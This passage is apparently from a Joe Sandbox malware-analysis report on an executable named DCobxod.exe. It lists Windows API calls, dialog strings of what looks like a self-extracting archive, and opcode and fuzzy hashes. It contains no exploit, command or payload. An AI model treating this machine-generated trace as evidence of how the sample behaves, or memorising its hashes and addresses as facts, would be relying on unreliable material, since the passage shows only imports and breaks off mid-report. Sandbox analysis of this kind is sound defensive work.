                                                                • Part of subcall function 0042A6C2: LoadResource.KERNEL32(00000000,?,?,?,0042B73D,00000066), ref: 0042A703
                                                                • Part of subcall function 0042A6C2: LockResource.KERNEL32(00000000,?,?,?,0042B73D,00000066), ref: 0042A712
                                                                • Part of subcall function 0042A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0042B73D,00000066), ref: 0042A72D
                                                                • Part of subcall function 0042A6C2: GlobalLock.KERNEL32(00000000), ref: 0042A73E
                                                                • Part of subcall function 0042A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0042A762
                                                                • Part of subcall function 0042A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0042A7A7
                                                                • Part of subcall function 0042A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0042A7C6
                                                                • Part of subcall function 0042A6C2: GlobalFree.KERNEL32(00000000), ref: 0042A7CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                              • String ID: ]
                                                              • API String ID: 1797374341-3352871620
                                                              • Opcode ID: a42ea25333222779cc9cfab07fa60d1250d2695d655dec2e1062c865cfaddcd5
                                                              • Instruction ID: a26bb846f34b1018275708ee6a6fbb1d89d01a37c7fd6cebfeb76ddb517d4b2c
                                                              • Opcode Fuzzy Hash: a42ea25333222779cc9cfab07fa60d1250d2695d655dec2e1062c865cfaddcd5
                                                              • Instruction Fuzzy Hash: C601E13260022167C7117B74AC09A6F7BBA9FC1B56F540026BD00A7295DF298D5952B9
                                                              APIs
                                                                • Part of subcall function 00411316: GetDlgItem.USER32(00000000,00003021), ref: 0041135A
                                                                • Part of subcall function 00411316: SetWindowTextW.USER32(00000000,004435F4), ref: 00411370
                                                              • EndDialog.USER32(?,00000001), ref: 0042D64B
                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0042D661
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0042D675
                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 0042D684
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: RENAMEDLG
                                                              • API String ID: 445417207-3299779563
                                                              • Opcode ID: 932f6934eb3add5c247500d35df736ac484a69046ceb3586ee53e9fe25bb02d1
                                                              • Instruction ID: 4cebb55edc0bae66b1bed5574159cbd3d200459d9658ff952e3f119e226bd265
                                                              • Opcode Fuzzy Hash: 932f6934eb3add5c247500d35df736ac484a69046ceb3586ee53e9fe25bb02d1
                                                              • Instruction Fuzzy Hash: 65012833B44224BBD2204F64BD09F57775CFB5AB02F510032F345A21D4C7AA9909977E
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00437E24,00000000,?,00437DC4,00000000,0044C300,0000000C,00437F1B,00000000,00000002), ref: 00437E93
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00437EA6
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00437E24,00000000,?,00437DC4,00000000,0044C300,0000000C,00437F1B,00000000,00000002), ref: 00437EC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: fc671439f461b8b800270c9b86e2389c4b41936ea2ba17e902214532f6913a39
                                                              • Instruction ID: 5a3dc35f5b5ac1e5d5d1b55c8230020639fd9f1633031849ace54e9d19ad3e9a
                                                              • Opcode Fuzzy Hash: fc671439f461b8b800270c9b86e2389c4b41936ea2ba17e902214532f6913a39
                                                              • Instruction Fuzzy Hash: 7DF04475A04218BBDB119FA1DC09B9EBFB4EF45716F0141BAF805A2250DB749E44CA98
                                                              APIs
                                                                • Part of subcall function 0042081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00420836
                                                                • Part of subcall function 0042081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0041F2D8,Crypt32.dll,00000000,0041F35C,?,?,0041F33E,?,?,?), ref: 00420858
                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0041F2E4
                                                              • GetProcAddress.KERNEL32(004581C8,CryptUnprotectMemory), ref: 0041F2F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                              • API String ID: 2141747552-1753850145
                                                              • Opcode ID: 7708fcf51d0fe1a7f07d9d4fcfc25b3c82f41ea21420c42c85b537a0739e1467
                                                              • Instruction ID: 2505efd9ae43185bac90339b40e1652f2901ed700fb69d4e829d848a5ff43125
                                                              • Opcode Fuzzy Hash: 7708fcf51d0fe1a7f07d9d4fcfc25b3c82f41ea21420c42c85b537a0739e1467
                                                              • Instruction Fuzzy Hash: 0BE026309407019ED720AF38980CB42BAD46F04F09F20882FF0DAA3640C7BCD0808B08
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer$_abort
                                                              • String ID:
                                                              • API String ID: 2252061734-0
                                                              • Opcode ID: a5bbb7edc08ebda530a36e873cccb185fe955cd4e0afc3ac21c0436950a5ed57
                                                              • Instruction ID: f607b6c2a79bd97915df931a98d503020516fe91dddacfa1f762501dab585d0c
                                                              • Opcode Fuzzy Hash: a5bbb7edc08ebda530a36e873cccb185fe955cd4e0afc3ac21c0436950a5ed57
                                                              • Instruction Fuzzy Hash: 3A512472600212AFDB298F15DA45BABB3A4FF1C710F24612FEC01572A1D7B9ED81D798
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0043BF39
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0043BF5C
                                                                • Part of subcall function 00438E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0043CA2C,00000000,?,00436CBE,?,00000008,?,004391E0,?,?,?), ref: 00438E38
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0043BF82
                                                              • _free.LIBCMT ref: 0043BF95
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0043BFA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 90f463cf6cab8604ec4f6166d502b80eb417ac43a0510441a3da0c40286330c4
                                                              • Instruction ID: e34c14cb8709b9934b6dd498e248a8fa3ec61507db29c300189e872b6541b48a
                                                              • Opcode Fuzzy Hash: 90f463cf6cab8604ec4f6166d502b80eb417ac43a0510441a3da0c40286330c4
                                                              • Instruction Fuzzy Hash: EE01B5666016117F27211A775C49D7B7A6DDECBF69714212EFA04C2201EF68CD0185F8
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00451030,00000200,004391AD,0043617E,?,?,?,?,0041D984,?,?,?,00000004,0041D710,?), ref: 0043986E
                                                              • _free.LIBCMT ref: 004398A3
                                                              • _free.LIBCMT ref: 004398CA
                                                              • SetLastError.KERNEL32(00000000,00443A34,00000050,00451030), ref: 004398D7
                                                              • SetLastError.KERNEL32(00000000,00443A34,00000050,00451030), ref: 004398E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 113e4de2a5ba3459a013bd341e05d6ee53ab0440dc1156c3616fc3381e08d508
                                                              • Instruction ID: 0094d9b47d1b54341b69ea2f6e1ef3edfe3f487acba9a55d767d3ac8f408cbaa
                                                              • Opcode Fuzzy Hash: 113e4de2a5ba3459a013bd341e05d6ee53ab0440dc1156c3616fc3381e08d508
                                                              • Instruction Fuzzy Hash: 4901F93A1647016BC31A37266C8591B2539DFDBB79F34213FF50592292EEBCCC02516D
                                                              APIs
                                                                • Part of subcall function 004211CF: ResetEvent.KERNEL32(?), ref: 004211E1
                                                                • Part of subcall function 004211CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 004211F5
                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00420F21
                                                              • CloseHandle.KERNEL32(?,?), ref: 00420F3B
                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00420F54
                                                              • CloseHandle.KERNEL32(?), ref: 00420F60
                                                              • CloseHandle.KERNEL32(?), ref: 00420F6C
                                                                • Part of subcall function 00420FE4: WaitForSingleObject.KERNEL32(?,000000FF,00421206,?), ref: 00420FEA
                                                                • Part of subcall function 00420FE4: GetLastError.KERNEL32(?), ref: 00420FF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                              • String ID:
                                                              • API String ID: 1868215902-0
                                                              • Opcode ID: 36dfb7441801c3adc6823427078b7faca17f5feb8aebf369784d1f6060bf18cc
                                                              • Instruction ID: ae12b6698bca53349f85c1b42f027b4a02ba5299a243c11f163566f49825cb48
                                                              • Opcode Fuzzy Hash: 36dfb7441801c3adc6823427078b7faca17f5feb8aebf369784d1f6060bf18cc
                                                              • Instruction Fuzzy Hash: 45019276100740EFC7329F64DD85BC6FBE9FB09B11F40092AF25A52160C7B67A44CA58
                                                              APIs
                                                              • _free.LIBCMT ref: 0043C817
                                                                • Part of subcall function 00438DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34), ref: 00438DE2
                                                                • Part of subcall function 00438DCC: GetLastError.KERNEL32(00443A34,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34,00443A34), ref: 00438DF4
                                                              • _free.LIBCMT ref: 0043C829
                                                              • _free.LIBCMT ref: 0043C83B
                                                              • _free.LIBCMT ref: 0043C84D
                                                              • _free.LIBCMT ref: 0043C85F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: be99a679324f644c5940a83c11684b421218da1c13bc69a198da2878cf11dc3f
                                                              • Instruction ID: 327de62e3ad8d9e64c51be583f3056764ba49e80cacb9330b43ec35e9c89766b
                                                              • Opcode Fuzzy Hash: be99a679324f644c5940a83c11684b421218da1c13bc69a198da2878cf11dc3f
                                                              • Instruction Fuzzy Hash: 11F0F432504201AB8614FB66E4C5C1773F9BA19B15F64282FF104E7651CB78FD408B5C
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00421FE5
                                                              • _wcslen.LIBCMT ref: 00421FF6
                                                              • _wcslen.LIBCMT ref: 00422006
                                                              • _wcslen.LIBCMT ref: 00422014
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0041B371,?,?,00000000,?,?,?), ref: 0042202F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CompareString
                                                              • String ID:
                                                              • API String ID: 3397213944-0
                                                              • Opcode ID: 4b8e5517ff3f2e55f4fe119971a5c8f96c6c32863ee68cc0bcac4c64ac3c86cf
                                                              • Instruction ID: 483c14ea38b3ae2559030c4f640b6997a8a16e41fa0cf0e773cf3fe3ebc7ed3a
                                                              • Opcode Fuzzy Hash: 4b8e5517ff3f2e55f4fe119971a5c8f96c6c32863ee68cc0bcac4c64ac3c86cf
                                                              • Instruction Fuzzy Hash: A8F06D32508024BBCF222F51EC0AD8A3F26EB45765F11801AF62A5B061CB729A61D698
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _swprintf
                                                              • String ID: %ls$%s: %s
                                                              • API String ID: 589789837-2259941744
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\DCobxod.exe,00000104), ref: 00437FAE
                                                              • _free.LIBCMT ref: 00438079
                                                              • _free.LIBCMT ref: 00438083
                                                              Strings
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\Desktop\DCobxod.exe
                                                              • API String ID: 2506810119-3673004843
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004331FB
                                                              • _abort.LIBCMT ref: 00433306
                                                              Strings
                                                              Similarity
                                                              • API ID: EncodePointer_abort
                                                              • String ID: MOC$RCC
                                                              • API String ID: 948111806-2084237596
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00417406
                                                                • Part of subcall function 00413BBA: __EH_prolog.LIBCMT ref: 00413BBF
                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 004174CD
                                                                • Part of subcall function 00417A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00417AAB
                                                                • Part of subcall function 00417A9C: GetLastError.KERNEL32 ref: 00417AF1
                                                                • Part of subcall function 00417A9C: CloseHandle.KERNEL32(?), ref: 00417B00
                                                              Strings
                                                              Similarity
                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                              • API String ID: 3813983858-639343689
                                                              APIs
                                                                • Part of subcall function 00411316: GetDlgItem.USER32(00000000,00003021), ref: 0041135A
                                                                • Part of subcall function 00411316: SetWindowTextW.USER32(00000000,004435F4), ref: 00411370
                                                              • EndDialog.USER32(?,00000001), ref: 0042AD98
                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0042ADAD
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0042ADC2
                                                              Strings
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: ASKNEXTVOL
                                                              • API String ID: 445417207-3402441367
                                                              APIs
                                                              • DialogBoxParamW.USER32(GETPASSWORD1,0001041E,0042B270,?,?), ref: 0042DE18
                                                              Strings
                                                              Similarity
                                                              • API ID: DialogParam
                                                              • String ID: GETPASSWORD1$rB$xzF
                                                              • API String ID: 665744214-139477248
                                                              APIs
                                                              • __fprintf_l.LIBCMT ref: 0041D954
                                                              • _strncpy.LIBCMT ref: 0041D99A
                                                                • Part of subcall function 00421DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00451030,00000200,0041D928,00000000,?,00000050,00451030), ref: 00421DC4
                                                              Strings
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                              • String ID: $%s$@%s
                                                              • API String ID: 562999700-834177443
                                                              APIs
                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0041AC5A,00000008,?,00000000,?,0041D22D,?,00000000), ref: 00420E85
                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0041AC5A,00000008,?,00000000,?,0041D22D,?,00000000), ref: 00420E8F
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0041AC5A,00000008,?,00000000,?,0041D22D,?,00000000), ref: 00420E9F
                                                              Strings
                                                              • Thread pool initialization failed., xrefs: 00420EB7
                                                              Similarity
                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                              • String ID: Thread pool initialization failed.
                                                              • API String ID: 3340455307-2182114853
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: Malloc
                                                              • String ID: (B$2B$A
                                                              • API String ID: 2696272793-3227996866
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                              • API String ID: 0-56093855
                                                              APIs
                                                                • Part of subcall function 0041E2E8: _swprintf.LIBCMT ref: 0041E30E
                                                                • Part of subcall function 0041E2E8: _strlen.LIBCMT ref: 0041E32F
                                                                • Part of subcall function 0041E2E8: SetDlgItemTextW.USER32(?,0044E274,?), ref: 0041E38F
                                                                • Part of subcall function 0041E2E8: GetWindowRect.USER32(?,?), ref: 0041E3C9
                                                                • Part of subcall function 0041E2E8: GetClientRect.USER32(?,?), ref: 0041E3D5
                                                              • GetDlgItem.USER32(00000000,00003021), ref: 0041135A
                                                              • SetWindowTextW.USER32(00000000,004435F4), ref: 00411370
                                                              Strings
                                                              Similarity
                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                              • String ID: B$0
                                                              • API String ID: 2622349952-128886849
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                              • Instruction ID: f1ab994af2a7f1595908513fae28402a6722882c3ca1d1b943708f84ab513aa7
                                                              • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                              • Instruction Fuzzy Hash: A3A14672A042869FEB25CF18C8817AFBBE5EF59310F18616FE4859B381C2BC9D41C758
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00417F69,?,?,?), ref: 0041A3FA
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00417F69,?), ref: 0041A43E
                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00417F69,?,?,?,?,?,?,?), ref: 0041A4BF
                                                              • CloseHandle.KERNEL32(?,?,?,00000800,?,00417F69,?,?,?,?,?,?,?,?,?,?), ref: 0041A4C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: File$Create$CloseHandleTime
                                                              • String ID:
                                                              • API String ID: 2287278272-0
                                                              • Opcode ID: 7468e3ba6882cdfe3be7c599abb9f7077304fbf0c2bf46376d9b7aa91c5716ae
                                                              • Instruction ID: 34f39c3482cb2e4a5c15f9bf2130df267fdda69177e5b3157961b24e987aa517
                                                              • Opcode Fuzzy Hash: 7468e3ba6882cdfe3be7c599abb9f7077304fbf0c2bf46376d9b7aa91c5716ae
                                                              • Instruction Fuzzy Hash: 9E41CF312493859AE721DF24DC45BEFBBE49B81704F04091EF9E093290D6A89A989B57
                                                              APIs
